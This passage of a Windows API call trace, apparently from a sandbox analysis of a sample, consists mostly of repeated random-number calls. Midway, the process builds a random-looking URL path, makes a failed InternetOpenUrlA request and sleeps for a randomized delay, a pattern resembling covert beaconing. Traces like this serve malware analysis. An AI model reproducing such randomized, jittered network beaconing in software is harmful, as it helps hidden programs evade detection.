dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.293] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.293] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.293] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26e, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a1b26e) returned 0x0 [0263.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.308] GetProcessHeap () returned 0x440000 [0263.308] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0263.308] lstrcpyA (in: lpString1=0x473350, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0263.308] lstrcatA (in: lpString1="P²¡\x03", lpString2="/WcLjf74ty01oCPku5Ks6vrc2Nxpb/g586i7U98vkKkhvLdp9kjf89kqvyq56m78sd4jemj/" | out: lpString1="P²¡\x03/WcLjf74ty01oCPku5Ks6vrc2Nxpb/g586i7U98vkKkhvLdp9kjf89kqvyq56m78sd4jemj/") returned="P²¡\x03/WcLjf74ty01oCPku5Ks6vrc2Nxpb/g586i7U98vkKkhvLdp9kjf89kqvyq56m78sd4jemj/" [0263.309] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0263.309] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/WcLjf74ty01oCPku5Ks6vrc2Nxpb/g586i7U98vkKkhvLdp9kjf89kqvyq56m78sd4jemj/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0263.309] GetProcessHeap () returned 0x440000 [0263.309] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0263.309] GetProcessHeap () returned 0x440000 [0263.309] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0263.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0263.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0263.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0263.310] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0263.310] Sleep (dwMilliseconds=0x1a5dd) [0263.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0263.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.528] GetProcessHeap () returned 0x440000 [0263.528] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4c40 [0263.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c41, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x4d4c41) returned 0x0 [0263.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c5d, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d4c5d) returned 0x0 [0263.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.538] 